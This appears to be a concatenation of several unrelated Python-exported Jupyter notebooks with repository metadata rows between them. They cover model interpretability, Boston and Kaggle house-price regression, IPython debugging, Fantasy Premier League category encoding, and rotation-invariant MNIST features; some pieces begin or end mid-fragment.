# - [eli5.sklearn.PermutationImportance](https://eli5.readthedocs.io/en/latest/autodocs/sklearn.html#eli5.sklearn.permutation_importance.PermutationImportance)
# - [eli5.show_weights](https://eli5.readthedocs.io/en/latest/autodocs/eli5.html#eli5.show_weights)
# + id="_zqgWLdWQKRd" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 153} outputId="742263e7-a2c5-4021-c765-dc04abf4d466"
import eli5
from eli5.sklearn import PermutationImportance
permuter = PermutationImportance(best, scoring = 'roc_auc', cv='prefit',
n_iter=2, random_state=42)
permuter.fit(X_test.values, y_test)
# + id="dfP2zCC9YKGu" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 1700} outputId="c247fc9d-d65b-4bbe-b99b-616330dc4996"
feature_names = X_test.columns.tolist()
eli5.show_weights(permuter, top=None, feature_names = feature_names)
# + id="3S0jXgVQYKsg" colab_type="code" colab={}
# + [markdown] id="uXb7EAacQKRv" colab_type="text"
# ### We can use importances for feature selection
#
# For example, we can remove features with zero importance. The model trains faster and the score does not decrease.
# + id="iA-QeG8bQKR8" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 34} outputId="662bbd0b-a767-40fb-d75a-60ba775a9b27"
print("Shape before removing features", X_train.shape)
# + id="fz2Zyvd1Y_as" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 289} outputId="d0c2364e-9fdc-4c20-e72f-9836ca36abe5"
mask = permuter.feature_importances_>0
features=X_train.columns[mask]
# + id="QpAChmE-QKSE" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 306} outputId="18188dcd-0236-4c1a-cd96-a473c917d340"
# Refit the model after we remove features with zero importance
param_distributions = {
'n_estimators': randint(50, 300),
'max_depth': randint(2, 4)
}
# n_iter & cv parameters are low here so the example runs faster
search = RandomizedSearchCV(
estimator=XGBClassifier(n_jobs=-1, random_state=42),
param_distributions=param_distributions,
n_iter=2,
scoring='roc_auc',
n_jobs=-1,
cv=2,
verbose=10,
return_train_score=True,
random_state=42
)
search.fit(X_train, y_train)
# + id="SaLbqxduQKSP" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 34} outputId="682f2f47-615c-4326-d967-ff50f0869eb5"
print('Cross-Validation ROC AUC:', search.best_score_)
# + id="Y46_2oA1QKSm" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 214} outputId="fe2d4c73-fcda-4d86-f151-f7554048c7df"
best = search.best_estimator_
X_test = X_test[features]
y_pred_proba = best.predict_proba(X_test)[:,1]
print('Test ROC AUC:', roc_auc_score(y_test, y_pred_proba))
# + [markdown] id="qUoutw2lQKTT" colab_type="text"
# # 2. Partial Dependence Plots
#
# PDPbox
# - [Gallery](https://github.com/SauceCat/PDPbox#gallery)
# - [API Reference: pdpbox.pdp.pdp_isolate](https://pdpbox.readthedocs.io/en/latest/pdp_isolate.html)
# - [API Reference: pdpbox.pdp.pdp_plot](https://pdpbox.readthedocs.io/en/latest/pdp_plot.html)
# + id="sgFKNfw4QKTW" colab_type="code" colab={}
# TODO
# + [markdown] id="bDB9VRObQKTo" colab_type="text"
# ### Explaining Partial Dependence Plots
# + [markdown] id="oKILMzEWQKTs" colab_type="text"
# From [PDPbox documentation](https://pdpbox.readthedocs.io/en/latest/):
#
#
# >**The common headache**: When using black box machine learning algorithms like random forest and boosting, it is hard to understand the relations between predictors and model outcome. For example, in terms of random forest, all we get is the feature importance. Although we can know which feature is significantly influencing the outcome based on the importance calculation, it really sucks that we don’t know in which direction it is influencing. And in most of the real cases, the effect is non-monotonic. We need some powerful tools to help understanding the complex relations between predictors and model prediction.
# + [markdown] id="4EyqgZiDQKTu" colab_type="text"
# [Animation by Christoph Molnar](https://twitter.com/ChristophMolnar/status/1066398522608635904), author of [_Interpretable Machine Learning_](https://christophm.github.io/interpretable-ml-book/)
#
# > Partial dependence plots show how a feature affects predictions of a Machine Learning model on average.
# > 1. Define grid along feature
# > 2. Model predictions at grid points
# > 3. Line per data instance -> ICE (Individual Conditional Expectation) curve
# > 4. Average curves to get a PDP (Partial Dependence Plot)
# + [markdown] id="XosoOCCTQKTx" colab_type="text"
# ### Partial Dependence Plots with 2 features, to see interactions
#
# PDPbox
# - [Gallery](https://github.com/SauceCat/PDPbox#gallery)
# - [API Reference: pdpbox.pdp.pdp_interact](https://pdpbox.readthedocs.io/en/latest/pdp_interact.html)
# - [API Reference: pdpbox.pdp.pdp_interact_plot](https://pdpbox.readthedocs.io/en/latest/pdp_interact_plot.html)
#
# Be aware of a bug in PDPBox version <= 0.20:
# - With the `pdp_interact_plot` function, `plot_type='contour` gets an error, but `plot_type='grid'` works
# - This will be fixed in the next release of PDPbox: https://github.com/SauceCat/PDPbox/issues/40
# + id="-9fJ-zkHQKT1" colab_type="code" colab={}
# TODO
# + [markdown] id="19rcKna2QLhf" colab_type="text"
# # 3. Shapley Values to explain individual predictions
#
# [Dan Becker explains,](https://www.kaggle.com/dansbecker/shap-values)
#
# >You've seen (and used) techniques to extract general insights from a machine learning model. But what if you want to break down how the model works for an individual prediction?
#
# >SHAP Values (an acronym from SHapley Additive exPlanations) break down a prediction to show the impact of each feature.
#
# >There is some complexity to the technique ... We won't go into that detail here, since it isn't critical for using the technique. [This blog post](https://towardsdatascience.com/one-feature-attribution-method-to-supposedly-rule-them-all-shapley-values-f3e04534983d) has a longer theoretical explanation.
# + id="HDFb99IEQLhi" colab_type="code" colab={}
y_pred = (y_pred_proba >= 0.5).astype(int)
confidence = np.abs(y_pred_proba - 0.5)
preds = pd.DataFrame({'y_test': y_test, 'y_pred': y_pred,
'y_pred_proba': y_pred_proba,
'confidence': confidence})
preds.head(10)
# + [markdown] id="6rNr3asFQLhv" colab_type="text"
# ### True positive
# + id="H65V4rDPQLhx" colab_type="code" colab={}
# TODO
# + [markdown] id="T0wAiFoxQM-X" colab_type="text"
# ### True negative
# + id="UOhQ-gBQQM-Z" colab_type="code" colab={}
# TODO
# + [markdown] id="jV58H7X6QM-f" colab_type="text"
# ### False positive
# + id="59tDlqZCQM-h" colab_type="code" colab={}
# TODO
# + [markdown] id="9pFGfnSqQM-p" colab_type="text"
# ### False negative
# + id="ehys-cq7QM-r" colab_type="code" colab={}
# TODO
# + [markdown] id="BMECg1g-QNp6" colab_type="text"
# # ASSIGNMENT
#
# In a clean notebook, using the **Seattle Bicycle Weather** dataset, make these visualizations:
#
# - Feature Importances
# - Permutation Importances
# - Partial Dependence Plot
# - Shapley Values
| 24,017 |
/debugging.ipynb
|
58239ded46929e6388310b9873b6b370d9c401ac
|
[] |
no_license
|
shashankravi96/quantecon-notebooks-python
|
https://github.com/shashankravi96/quantecon-notebooks-python
| 0 | 0 | null | 2020-03-04T02:47:57 | 2020-03-03T23:18:33 | null |
Jupyter Notebook
| false | false |
.py
| 10,545 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
import numpy as np
import pandas as pd
import sklearn
from sklearn.datasets import load_boston
df = load_boston()
df.keys()
boston = pd.DataFrame(df.data, columns=df.feature_names)
boston.head()
boston['MEDV'] = df.target
boston.head()
boston.isnull()
boston.isnull().sum()
# +
from sklearn.model_selection import train_test_split
X = boston.drop('MEDV',axis=1)
Y = boston['MEDV']
X_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size = 0.15, random_state=5)
print(X_train.shape)
print(X_test.shape)
print(Y_train.shape)
print(Y_test.shape)
# -
from sklearn.linear_model import LinearRegression
from sklearn.metrics import mean_squared_error
# +
#Fitting model on the training dataset
lin_model = LinearRegression()
lin_model.fit(X_train, Y_train)
# +
y_train_predict = lin_model.predict(X_train)
rmse = (np.sqrt(mean_squared_error(Y_train, y_train_predict)))
print("The model performance for training set")
print('RMSE is {}'.format(rmse))
print("\n")
#on testing set
y_test_predict = lin_model.predict(X_test)
rmse = (np.sqrt(mean_squared_error(Y_test, y_test_predict)))
print("The model performance for testing set")
print('RMSE is {}'.format(rmse))
# -
xplore other settings.
#
# We’ll need the following imports
# + hide-output=false
import numpy as np
import matplotlib.pyplot as plt
%matplotlib inline
# -
# ## Debugging
#
#
# <a id='index-1'></a>
# ### The `debug` Magic
#
# Let’s consider a simple (and rather contrived) example
# + hide-output=false
def plot_log():
fig, ax = plt.subplots(2, 1)
x = np.linspace(1, 2, 10)
ax.plot(x, np.log(x))
plt.show()
plot_log() # Call the function, generate plot
# -
# This code is intended to plot the `log` function over the interval $ [1, 2] $.
#
# But there’s an error here: `plt.subplots(2, 1)` should be just `plt.subplots()`.
#
# (The call `plt.subplots(2, 1)` returns a NumPy array containing two axes objects, suitable for having two subplots on the same figure)
#
# The traceback shows that the error occurs at the method call `ax.plot(x, np.log(x))`.
#
# The error occurs because we have mistakenly made `ax` a NumPy array, and a NumPy array has no `plot` method.
#
# But let’s pretend that we don’t understand this for the moment.
#
# We might suspect there’s something wrong with `ax` but when we try to investigate this object, we get the following exception:
# + hide-output=false
ax
# -
# The problem is that `ax` was defined inside `plot_log()`, and the name is
# lost once that function terminates.
#
# Let’s try doing it a different way.
#
# We run the first cell block again, generating the same error
# + hide-output=false
def plot_log():
fig, ax = plt.subplots(2, 1)
x = np.linspace(1, 2, 10)
ax.plot(x, np.log(x))
plt.show()
plot_log() # Call the function, generate plot
# -
# But this time we type in the following cell block
# + [markdown] hide-output=false
# ```ipython
# %debug
# ```
#
# -
# You should be dropped into a new prompt that looks something like this
# + [markdown] hide-output=false
# ```ipython
# ipdb>
# ```
#
# -
# (You might see pdb> instead)
#
# Now we can investigate the value of our variables at this point in the program, step forward through the code, etc.
#
# For example, here we simply type the name `ax` to see what’s happening with
# this object:
# + [markdown] hide-output=false
# ```ipython
# ipdb> ax
# array([<matplotlib.axes.AxesSubplot object at 0x290f5d0>,
# <matplotlib.axes.AxesSubplot object at 0x2930810>], dtype=object)
# ```
#
# -
# It’s now very clear that `ax` is an array, which clarifies the source of the
# problem.
#
# To find out what else you can do from inside `ipdb` (or `pdb`), use the
# online help
# + [markdown] hide-output=false
# ```ipython
# ipdb> h
#
# Documented commands (type help <topic>):
# ========================================
# EOF bt cont enable jump pdef r tbreak w
# a c continue exit l pdoc restart u whatis
# alias cl d h list pinfo return unalias where
# args clear debug help n pp run unt
# b commands disable ignore next q s until
# break condition down j p quit step up
#
# Miscellaneous help topics:
# ==========================
# exec pdb
#
# Undocumented commands:
# ======================
# retval rv
#
# ipdb> h c
# c(ont(inue))
# Continue execution, only stop when a breakpoint is encountered.
# ```
#
# -
# ### Setting a Break Point
#
# The preceding approach is handy but sometimes insufficient.
#
# Consider the following modified version of our function above
# + hide-output=false
def plot_log():
fig, ax = plt.subplots()
x = np.logspace(1, 2, 10)
ax.plot(x, np.log(x))
plt.show()
plot_log()
# -
# Here the original problem is fixed, but we’ve accidentally written
# `np.logspace(1, 2, 10)` instead of `np.linspace(1, 2, 10)`.
#
# Now there won’t be any exception, but the plot won’t look right.
#
# To investigate, it would be helpful if we could inspect variables like `x` during execution of the function.
#
# To this end, we add a “break point” by inserting `breakpoint()` inside the function code block
# + [markdown] hide-output=false
# ```python3
# def plot_log():
# breakpoint()
# fig, ax = plt.subplots()
# x = np.logspace(1, 2, 10)
# ax.plot(x, np.log(x))
# plt.show()
#
# plot_log()
# ```
#
# -
# Now let’s run the script, and investigate via the debugger
# + [markdown] hide-output=false
# ```ipython
# > <ipython-input-6-a188074383b7>(6)plot_log()
# -> fig, ax = plt.subplots()
# (Pdb) n
# > <ipython-input-6-a188074383b7>(7)plot_log()
# -> x = np.logspace(1, 2, 10)
# (Pdb) n
# > <ipython-input-6-a188074383b7>(8)plot_log()
# -> ax.plot(x, np.log(x))
# (Pdb) x
# array([ 10. , 12.91549665, 16.68100537, 21.5443469 ,
# 27.82559402, 35.93813664, 46.41588834, 59.94842503,
# 77.42636827, 100. ])
# ```
#
# -
# We used `n` twice to step forward through the code (one line at a time).
#
# Then we printed the value of `x` to see what was happening with that variable.
#
# To exit from the debugger, use `q`.
# ## Other Useful Magics
#
# In this lecture, we used the `%debug` IPython magic.
#
# There are many other useful magics:
#
# - `%precision 4` sets printed precision for floats to 4 decimal places
# - `%whos` gives a list of variables and their values
# - `%quickref` gives a list of magics
#
#
# The full list of magics is [here](http://ipython.readthedocs.org/en/stable/interactive/magics.html).
fillna(0)
# Bsmt Features: Similar consideration as in Training set (np.nan = no Basement so np.nan → None)
df['TotalBsmtSF'] = df['TotalBsmtSF'].fillna(0)
df['BsmtFinSF1'] = df['BsmtFinSF1'].fillna(0)
df['BsmtFinSF2'] = df['BsmtFinSF2'].fillna(0)
df['BsmtUnfSF'] = df['BsmtUnfSF'].fillna(0)
df['BsmtHalfBath'] = df['BsmtHalfBath'].fillna(0)
df['BsmtFullBath'] = df['BsmtFullBath'].fillna(0)
# LotFrontage: Missing values must be imputed; as there is no other obvious way, the value can be imputed by linear regression
tsvd = TruncatedSVD(n_components=10)
imputation_pipeline = Pipeline([('encoder',OneHotEncoder(handle_unknown='ignore')),
('tsvd',tsvd),
('linreg',LinearRegression())])
X_imp_train = df.loc[df['LotFrontage'].notnull()].drop(['SalePrice','LotFrontage'],axis=1)
y_imp_train = df.loc[:,'LotFrontage'].dropna()
X_imp = df.loc[df['LotFrontage'].isnull()].drop(['SalePrice','LotFrontage'],axis=1)
imputation_pipeline.fit(X_imp_train,y_imp_train)
imp_values = imputation_pipeline.predict(X_imp)
index_list = df.loc[df['LotFrontage'].isnull()].index.tolist()
imp_Series = pd.Series(imp_values,index=index_list)
df['LotFrontage'] = df['LotFrontage'].fillna(imp_Series)
assert df.drop('SalePrice',axis=1).isnull().sum().sum() == 0
# +
#Add information: Houses with same YearRemodAdd and YearBuilt have no Remod Added
df.loc[df['YearRemodAdd']==df['YearBuilt'],'YearRemodAdd'] = 'None'
# +
# Converting numerical features to objects: Nominal features
to_be_converted = ['MoSold','YrSold','YearBuilt','YearRemodAdd','GarageYrBlt','MSSubClass']
for feature in to_be_converted:
df[feature].astype(object)
# +
# Convert numerical features to objects/categories: Ordinal Features
to_be_converted_ordinal = ['MSZoning','Alley','MasVnrType','ExterQual','FireplaceQu','BsmtQual','BsmtCond','HeatingQC','KitchenQual',
'GarageQual','GarageCond','PoolQC','Utilities','BldgType','OverallQual','OverallCond','ExterCond','BsmtExposure',
'BsmtFinType1','BsmtFinType2','Functional','GarageFinish','PavedDrive','Fence']
for feature in to_be_converted_ordinal:
le = LabelEncoder()
encoded_feature = le.fit_transform(df[feature])
df[feature] = encoded_feature
# +
# Shift numerical features' distribution towards normal distribution by running a boxcox transformation over all remaining numerical features
# For easier interpretability, use simple log transformation for target variable
num_features = [feature for feature in df.columns if df[feature].dtype != 'object']
for feature in num_features:
if feature != 'SalePrice':
transform_data = df[feature].loc[df[feature]>0]
lm = 0.15
transform_result = stats.boxcox(transform_data,lm)
transform_impose = np.empty_like(df[feature])
transform_impose[df[feature] > 0] = transform_result
transform_impose[df[feature]<= 0] = df[feature].loc[df[feature]<=0]
df[feature] = transform_impose
else:
df[feature] = df[feature].transform(lambda x: np.log(x))
# -
# Get dummies from dataset
df_processed = pd.get_dummies(df)
# Data Wrangling is concluded
train_processed = df_processed.loc[df_processed['SalePrice'].notnull()]
test_processed = df_processed.loc[df_processed['SalePrice'].isnull()]
assert train_processed.isnull().sum().sum() == 0
assert test_processed.isnull().sum().sum() == test_processed.shape[0]
assert train_processed.shape[1] == test_processed.shape[1]
assert test_processed.shape[0] == df_test.shape[0]
train_processed.to_csv('train_processed.csv',index_label='Id')
test_processed.drop('SalePrice',axis=1).to_csv('test_processed.csv',index_label='Id')
# ## Modelling
# Implementing RMSLE function
def rmsle(labels,predictions,exponential_transformation=True):
if exponential_transformation:
labels = np.exp(labels)
predictions = np.exp(predictions)
root_mean_squared_error = np.mean((np.log(labels)-np.log(predictions))**2)**0.5
return root_mean_squared_error
# Load processed training data
train_data = pd.read_csv('train_processed.csv',index_col='Id')
# Prepare the data
X = train_data.drop('SalePrice',axis=1)
y_train = np.array(train_data.loc[:,'SalePrice'])
# Data preparation
preparation_pipeline = make_pipeline(StandardScaler())
print(X.shape)
X_train = preparation_pipeline.fit_transform(X)
# Prepare KFold validation function
def rmsle_cv(model):
kf = KFold(3,shuffle=True,random_state=42).get_n_splits(X_train)
rmse = np.sqrt(-cross_val_score(model,X_train,y_train,scoring='neg_mean_squared_error',cv=kf))
return rmse
# Define model test function
# TODO: Implement GridSearchCV or RandomizedGridSearchCV
def model_testing(model):
rmsle_train_score = rmsle_cv(model)
model.fit(X_train,y_train)
return rmsle_train_score
# +
# Train Base Models
lin_reg = LinearRegression()
rand_for = RandomForestRegressor()
sup_vec_reg = SVR()
ada_boost = AdaBoostRegressor()
grad_boost = GradientBoostingRegressor(n_estimators=3000, learning_rate=0.05,
max_depth=4, max_features='sqrt',
min_samples_leaf=15, min_samples_split=10,
loss='huber', random_state =5)
xgboost_reg = xgb.XGBRegressor(colsample_bytree=0.4603, gamma=0.0468,
learning_rate=0.05, max_depth=3,
min_child_weight=1.7817, n_estimators=2200,
reg_alpha=0.4640, reg_lambda=0.8571,
subsample=0.5213, silent=1,
random_state =7, nthread = -1)
models= [lin_reg,rand_for,sup_vec_reg,ada_boost,grad_boost,xgboost_reg]
names = ['LR','RF','SVR','ABR','GBR','XGB-Test']
train_results = list(map(model_testing,models))
# -
# Training Results
rmsle_train_scores = [train_results[i] for i in range(len(train_results))]
# +
# Plotting Training Results
train_results_df = pd.DataFrame(rmsle_train_scores,columns=['CV'+str(i+1) for i in range(rmsle_train_scores[0].shape[0])])
train_results_df['Model'] = names
train_results_df1 = train_results_df.melt(id_vars='Model',var_name='Validation',value_name='RMSLE-Score')
sns.barplot(x='Model',y='RMSLE-Score',data=train_results_df1,hue='Validation').set_title('Training RMSLEs')
plt.ylim(0,0.5)
plt.show()
print(train_results_df)
# -
# Train a UL model on the data (for testing purposes of the meta model)
# Model: Gaussian Mixture Model, testing for optimal k
from sklearn.mixture import GaussianMixture
# Define Testing function
def gmm_test(data,max_components):
total_score = []
test_components = []
for i in range(max_components):
model = GaussianMixture(n_components=i+1)
labels = model.fit_predict(data)
score = model.aic(data)
total_score.append(score)
test_components.append(i+1)
sns.lineplot(x=test_components,y=total_score)
plt.xticks(list(range(1,31)))
plt.show()
# Testing for the optimal model
gmm_test(X_train,30)
# It appears, that the optimal model, according to the AIC, is one with n_components = 22
gm_model = GaussianMixture(n_components = 22)
label_predictions = gm_model.fit_predict(X_train)
if gm_model not in models:
models.append(gm_model)
# +
# Combine predictions and labels
lin_reg_pred = lin_reg.predict(X_train)
rand_for_pred = rand_for.predict(X_train)
sup_vec_reg_pred = sup_vec_reg.predict(X_train)
ada_boost_pred = ada_boost.predict(X_train)
grad_boost_pred = grad_boost.predict(X_train)
xgboost_reg_pred = xgboost_reg.predict(X_train)
meta_data_train = np.column_stack((lin_reg_pred,rand_for_pred,sup_vec_reg_pred,ada_boost_pred,grad_boost_pred,xgboost_reg_pred,label_predictions))
# +
# Train Meta model (keras DLN)
from keras.models import Sequential
from keras.layers import Dropout, Dense, LeakyReLU
meta_model_dnn = Sequential()
meta_model_dnn.add(Dense(256,kernel_initializer='normal',input_dim=meta_data_train.shape[1]))
meta_model_dnn.add(Dropout(rate=0.2))
meta_model_dnn.add(LeakyReLU())
for i in range(100):
meta_model_dnn.add(Dense(128,kernel_initializer='normal'))
meta_model_dnn.add(Dropout(rate=0.2))
meta_model_dnn.add(LeakyReLU())
meta_model_dnn.add(Dense(1,kernel_initializer='normal',activation='linear'))
meta_model_dnn.compile(optimizer='SGD',loss='mean_squared_error',metrics=['mean_squared_error'])
meta_model_dnn.summary()
# -
# Train Meta Model
meta_model_dnn.fit(meta_data_train,y_train,epochs=500,batch_size=32,shuffle=True,validation_split=0.1,verbose=1)
# Evaluate Meta Model
yhat = meta_model_dnn.predict(meta_data_train)
meta_training_score = rmsle(y_train,yhat,exponential_transformation=True)
print('Meta-Model Training Score: {}'.format(meta_training_score))
# +
# As the simple Keras model did not perform as hoped, let's use a simple XGBRegressor model
xgb_meta = xgb.XGBRegressor(colsample_bytree=0.4603, gamma=0.0468,
learning_rate=0.05, max_depth=3,
min_child_weight=1.7817, n_estimators=2200,
reg_alpha=0.4640, reg_lambda=0.8571,
subsample=0.5213, silent=1,
random_state =7, nthread = -1)
xgb_meta.fit(meta_data_train,y_train)
test_prediction = xgb_meta.predict(meta_data_train)
print('XGBR Meta Model Score: {}'.format(rmsle(y_train,test_prediction,exponential_transformation=True)))
# -
# ### Submission
# Although the final Meta model returned the best accuracy, let's try and submit the results from all models!
submission_df = pd.read_csv('test_processed.csv',index_col='Id')
submission_index = submission_df.index.to_list()
# Prepare test_data
submission_pipeline = make_pipeline(StandardScaler())
X_test = submission_pipeline.fit_transform(submission_df)
# Create Predictions for submission
def create_submissions(models,meta_model,test_data):
meta_data = np.empty((test_data.shape[0],len(models)))
result_dict = {}
for i,model in enumerate(models):
yhat = np.exp(model.predict(test_data))
yhat_meta = model.predict(test_data)
meta_data[:,i] = yhat_meta
result_dict[type(model).__name__] = yhat
else:
meta_predictions = np.exp(meta_model.predict(meta_data))
result_dict['MetaModel'] = meta_predictions
for key,value in result_dict.items():
if key != 'GaussianMixture':
export = pd.DataFrame(value,columns=['SalePrice'])
export.index = submission_index
export.index.name='Id'
export.to_csv(key+'.csv')
# +
# Export Predictions
assert X_train.shape[1] == X_test.shape[1] and X_test.shape[0] == df_test.shape[0]
meta_data = create_submissions(models,xgb_meta,X_test)
| 17,742 |
/jupyter/preparing_data/.ipynb_checkpoints/05 - Encode Categories-checkpoint.ipynb
|
53ff1395d717e5c00f7a65de04d6b0fc6c97fe52
|
[] |
no_license
|
richardjdury/fpl
|
https://github.com/richardjdury/fpl
| 4 | 1 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 232,800 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# + [markdown] toc=true
# <h1>Table of Contents<span class="tocSkip"></span></h1>
# <div class="toc"><ul class="toc-item"><li><span><a href="#Import-Packages" data-toc-modified-id="Import-Packages-1"><span class="toc-item-num">1 </span>Import Packages</a></span></li><li><span><a href="#Read-in-Data" data-toc-modified-id="Read-in-Data-2"><span class="toc-item-num">2 </span>Read in Data</a></span></li><li><span><a href="#OneHot-Position-Data" data-toc-modified-id="OneHot-Position-Data-3"><span class="toc-item-num">3 </span>OneHot Position Data</a></span></li><li><span><a href="#Binary-Encode-Team-and-opponent_team" data-toc-modified-id="Binary-Encode-Team-and-opponent_team-4"><span class="toc-item-num">4 </span>Binary Encode Team and opponent_team</a></span></li></ul></div>
# -
# ## Import Packages
# +
import numpy as np
import pandas as pd
import category_encoders as ce
import matplotlib.pyplot as plt
pd.set_option('display.max_columns', None)
# -
# ## Read in Data
pp = pd.read_csv('../../data/csv/player_performance_04.csv')
pp.head()
# ## OneHot Position Data
pp_position = pp.copy()
ohe = ce.one_hot.OneHotEncoder(cols=["position"])
pp_position = ohe.fit_transform(pp_position)
pp_position = pp_position.rename(columns={"position_1": "GKP", "position_2": "DEF", "position_3": "MID", "position_4": "FWD"})
pp_position[["GKP","DEF","MID","FWD"]] = pp_position[["GKP","DEF","MID","FWD"]].replace({1: True, 0: False})
pp_position.head()
# ## Binary Encode Team and opponent_team
pp_team = pp_position.copy()
lbe = ce.binary.BinaryEncoder(cols=["team", "opponent_team"])
pp_team = lbe.fit_transform(pp_team)
pp_team.head()
# Identify new columns and replace 1 and 0 with True and False
new_cols = list(set(pp_team.columns)-set(pp_position.columns))
pp_team[new_cols] = pp_team[new_cols].replace({1: True, 0: False})
pp_team.head()
pp_team.to_csv(r'../../data/csv/player_performance_05.csv',
index=False,
index_label=False)
| 2,286 |
/Preparation.ipynb
|
141724383a397ca574237749e2384674935b57a5
|
[] |
no_license
|
akloster/ep2015-slides
|
https://github.com/akloster/ep2015-slides
| 1 | 1 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 1,550,209 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
import tensorflow as tf
from tensorflow import keras
import matplotlib.pyplot as plt
import math
import numpy as np
import itertools as it
import dill
dill.dump_session('notebook_env.db')
(x_train0, y_train0), (x_test, y_test) = tf.keras.datasets.mnist.load_data()
x_train = x_train0[:50000]
y_train = y_train0[:50000]
x_hold = x_train0[50000:]
y_hold = y_train0[50000:]
y_train.shape
plt.imshow(x_train[5], cmap='Greys')
# +
x_train_flat = np.array([x.reshape((784)) for x in x_train])
x_test_flat = np.array([x.reshape((784))for x in x_test])
x_train_flat.shape
#"Unrolled" MNIST array is numbered left to right, top to bottom., so first entry of each unrolled vector is top-left pixel
# +
def GF00(j):
return(np.exp(-2*(np.floor(j/28)-13.5)**2-(j%28 - 13.5)**2))
#Handle r=0 case specially
# +
GF = np.zeros((417,784))
GF[0,] = [GF00(x) for x in np.arange(784)]
for i in range(1,32*13+1):
for j in range(784):
r = (np.floor((i-1)/32)+1)
t = (i-1)%32*(2*np.pi/32)
u = 27-np.floor(j/28)
v = j%28
GF[i,j] = np.exp((-(v-13.5-r*math.cos(t))**2-(u-13.5-r*math.sin(t))**2)/((.02*r+.5)))
# +
x_train_rot_nonorm = np.transpose(np.matmul(GF, np.transpose(x_train_flat)))
x_test_rot_nonorm = np.transpose(np.matmul(GF, np.transpose(x_test_flat)))
x_train_rot_nonorm.shape
#Now normalize each image by dividing image values by max pixel intensity.
x_train_rot = np.transpose(np.transpose(x_train_rot_nonorm)/np.amax(x_train_rot_nonorm,axis=1))
x_test_rot = np.transpose(np.transpose(x_test_rot_nonorm)/np.amax(x_test_rot_nonorm,axis=1))
# -
#Check normalization works
print(max(x_test_rot[55]), max(x_train_rot[66]))
def rot_plot(image):
dum = np.array(range(416))
rad = 1.3*(np.floor(dum/32)+1)
theta = (dum)%32*(2*np.pi/32)
x_coord = np.concatenate(([0],np.multiply(rad,np.cos(theta))))
y_coord = np.concatenate(([0],np.multiply(rad, np.sin(theta))))
plt.figure(figsize=(10,10))
plt.scatter(x = x_coord, y = y_coord, c = image,cmap="Greys")
plt.show()
x_train_rot.shape
print("Number is",y_train[5])
rot_plot(x_train_rot[5])
def firstdeg(x_train_rot):
dummy = np.empty(14)
dummy[0] = x_train_rot[0]
for i in range(13):
dummy[i+1] = np.sum(x_train_rot[(32*i+1):(32*i+33)])/32 #32*i+1 selects the radius
return(dummy)
#FRANK!!! REMEMBER INDEXING [1:3] ONLY SELECTS ENTRIES 1 AND 2!!!
def secdeg(x_train_rot):
dummy = [x_train_rot[0]**2]
#Here calculate the terms involving center point
for r in range(13):
dummy.append(np.sum(x_train_rot[0]*x_train_rot[(r*32+1):(r*32+33)])/32)
#Then, calculate everything else
for i in range(13):
for j in range(13):
for k in range(9):
if k == 0 and i<j: #don't double count these special pairs
continue
total = 0
for s in range(32):
total += x_train_rot[i*32+1+s]*x_train_rot[j*32+1+(2*k+s)%32]
dummy.append(total/32)
return(np.array(dummy))
# +
# def secdeg_mat(x_train_rot):
# dummy = [x_train_rot[:,0]**2]
# #Here calculate the terms involving center point
# for r in range(10):
# np.c_[dummy,(np.sum(np.transpose(np.transpose(x_train_rot[:,(r*32+1):(r*32+33)])*x_train_rot[:,0]),axis=1)/32)]
# #Then, calculate everything else
# for i in range(10):
# for j in range(10):
# for k in range(17):
# if k == 0 and i<j: #don't double count these special pairs
# continue
# total = 0
# for s in range(32):
# total += x_train_rot[i*32+1+s]*x_train_rot[j*32+1+(k+s)%32]
# dummy.append(total/32)
# return(np.array(dummy))
# +
# def thirdeg(x_train_rot):
# #Only calculate triangles with vertices on same radius, angles.
# #Fixing the minimal angle, there is a bijection (?):
# dummy = []
# for r in range(6):
# for i in range(1,6):
# for j in range(16):
# if j < i or j > (16 - 2*i):
# continue
# total = 0
# for s in range(32):
# total += x_train_rot[32*r+1+s]*x_train_rot[32*r+1+(2*i+s)%32]*x_train_rot[32*r+1+(2*(i+j)+s)%32]
# dummy.append(total/32)
# return(np.array(dummy))
# -
# def rot_features(x_train_rot):
# return(np.concatenate([firstdeg(x_train_rot),secdeg(x_train_rot),thirdeg(x_train_rot)]))
def rot_features(x_train_rot):
return(np.concatenate([firstdeg(x_train_rot),secdeg(x_train_rot)]))
print(firstdeg(x_train_rot[0]).shape)
print(secdeg(x_train_rot[0]).shape)
#firstdeg(x_train_rot[0])
print(max(rot_features(x_train_rot[7])),max(firstdeg(x_train_rot[7])),\
max(secdeg(x_train_rot[7])))
x_train_features = np.array([rot_features(x) for x in x_train_rot])
x_test_features = np.array([rot_features(x) for x in x_test_rot])
x_train_features.shape
# +
model = keras.Sequential([
keras.layers.Dense(200, input_shape = (1471,), activation=tf.nn.relu),
keras.layers.Dense(10, activation=tf.nn.softmax)
])
model.compile(optimizer='adam',
loss='sparse_categorical_crossentropy',
metrics=['accuracy'])
#Seems to be very sensitive to initialization:
#First try, took maybe 10 runs of 5 epochs to get .83
#Second try, got stuck at local minima with .5 accuracy
#Third try, first run got one a good path, achieved .9 accuracy by epoch 15
#After normazliation, optimization seems to run muuch smoother, e very run so far gets to above .9 accuracy
# -
model.fit(x_train_features, y_train, verbose=1, epochs=15)
model.evaluate(x_test_features, y_test)
#Looking at predictions made by trained model
predictions1 = np.argmax(model.predict(x_test_features),axis=1)
predictions = np.column_stack((predictions1,y_test))
print(predictions[1:10,])
# +
# #Now, we look at a model that considers up to second order features:
# x_train_secorder = x_train_features[:,0:611]
